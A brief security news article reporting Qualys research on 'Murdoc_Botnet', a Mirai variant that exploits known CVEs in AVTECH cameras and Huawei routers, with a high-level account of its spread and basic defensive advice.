New Mirai variant targets routers from Huawei

botnet

Huawei routers and AVTECH cameras get infected by a new variant of Mira botnet.

Researchers from cybersecurity firm Qualys Inc. are warning of a new variant of the Mirai botnet called “Murdoc_Botnet.” This malware targets vulnerabilities in AVTECH cameras and Huawei HG523 routers and has already infected at least 1,300 devices worldwide. Particularly affected devices have been identified in Malaysia, Thailand, Mexico and Indonesia.

Distributed by bash scripts

With Mirai variants like this one, the goal is for Murdoc_Botnet to infect as many as possible and create extensive bot networks. According to Qualys, the malware uses ELF files and shell scripts to infiltrate devices. The scripts exploit vulnerabilities such as CVE-2024-7029 and CVE-2017-17215 to install malicious software and connect to command-and-control (C&C) servers, SiliconANGLE writes.

The infrastructure consists of more than 100 C&C servers, which control infected devices, enabling the spread of malware. Especially IoT devices such as cameras and routers are a target of this type of attack, as they often remain unprotected and vulnerabilities are not patched.

Murdoc_Botnet spreads via bash scripts that download and execute malware. After execution, any trace of the scripts is automatically deleted. Qualys advises companies to monitor suspicious processes and network traffic and to be careful with unknown shell scripts. Regular updates of systems and firmware are crucial to prevent infections.